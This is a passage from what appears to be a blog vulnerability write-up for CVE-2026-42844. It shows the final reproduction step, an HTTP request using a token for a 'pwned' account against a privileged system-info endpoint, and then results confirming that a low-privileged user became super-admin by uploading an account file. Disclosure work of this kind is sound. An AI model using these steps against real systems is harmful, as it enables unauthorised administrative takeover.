https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/pwned-login_hu1879175009345872517.png 1024w" loading="lazy" alt="pwned-login.png" class="gallery-image" data-flex-grow="180" data-flex-basis="432px" ></p> <h3 id="step-4-verify-privileged-api-access">Step 4: Verify privileged API access </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-http" data-lang="http"><span class="line"><span class="cl"><span class="nf">GET</span> <span class="nn">/api/v1/system/info</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span> </span></span><span class="line"><span class="cl"><span class="n">Host</span><span class="o">:</span> <span class="l">127.0.0.1:8123</span> </span></span><span class="line"><span class="cl"><span class="n">X-API-Token</span><span class="o">:</span> <span class="l">&lt;PWNED_TOKEN&gt;</span> </span></span><span class="line"><span class="cl"><span class="n">Connection</span><span class="o">:</span> <span class="l">close</span> </span></span></code></pre></td></tr></table> </div> </div><p>Expected result:</p> <p>The request succeeds and returns system-level information.</p> <p>Attachment:</p> <p><img src="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/system-info.png" width="1480" height="831" srcset="https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/system-info_hu17767129393880007450.png 480w, https://0d000721999.github.io/p/cve-2026-42844%E6%88%91%E7%9A%84%E7%AC%AC%E4%B8%80%E4%B8%AAcve%E6%8C%96%E6%8E%98/system-info_hu4750097170870978189.png 1024w" loading="lazy" alt="system-info.png" class="gallery-image" data-flex-grow="178" data-flex-basis="427px" ></p> <h2 id="actual-verified-result-1">Actual Verified Result </h2><p>I reproduced this issue locally.</p> <ul> <li>the upload response returned <code>user/accounts/pwned.yaml</code></li> <li>logging in as <code>pwned</code> succeeded</li> <li>the new account had <code>super_admin = true</code></li> <li>privileged endpoints such as <code>/api/v1/system/info</code> were accessible</li> </ul> <h2 id="security-impact-1">Security Impact </h2><p>This vulnerability allows a low-privileged authenticated API user to escalate directly to full API administrative control by creating a new super-admin account.</p>